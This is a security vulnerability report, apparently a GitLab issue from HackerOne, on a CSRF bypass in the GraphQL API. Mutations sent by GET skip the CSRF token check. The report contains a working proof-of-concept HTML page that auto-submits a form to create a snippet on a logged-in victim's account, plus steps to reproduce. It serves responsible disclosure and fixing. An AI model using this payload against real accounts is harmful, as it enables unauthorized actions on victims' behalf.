CSRF on /api/graphql allows executing mutations through GET requests
HackerOne report #1122408 by az3z3l
on 2021-03-10, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Mutations are edit
or create
queries used in Graphql. Gitlab prevents CSRF in this functionality by sending a POST request with a X-CSRF-Token header. The bug I found here was that, when we send a GET request, the backend does not expect the X-CSRF-Token header. Using this, an attacker could leverage this to bypass the existing CSRF protection
Code for Testing
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="referrer" content="none">
<meta name="referrer" content="no-referrer">
</head>
<body>
<form action="https://gitlab.com/api/graphql/" id="csrf-form" method="GET">
<input name="query" value="mutation CreateSnippet($input: CreateSnippetInput!) { createSnippet(input: $input) { errors snippet { webUrl __typename } needsCaptchaResponse captchaSiteKey __typename }}">
<input name="variables" value='{"input":{"title":"Tesssst Snippet","description":"Hello World","visibilityLevel":"public","blobActions":[{"action":"create","previousPath":"readme.md","content":"reading this.md","filePath":"readme.md"}],"uploadedFiles":[],"projectPath":""}}'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
This exploit would create a snippet named Tesssst Snippet
on the user's account.
Steps to Reproduce
- Host this file
- Login to gitlab
- Open the link to that html
- Check the snippets for the logged in user.
Impact
The attacker could control bypass the existing CSRF check on the graphql endpoint.
POC
Attached the request and response screenshot
What is the expected correct behavior?
The backend must check the existence of csrf tokens for GET requests as well.
Impact
The attacker could control bypass the existing CSRF check on the graphql endpoint.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: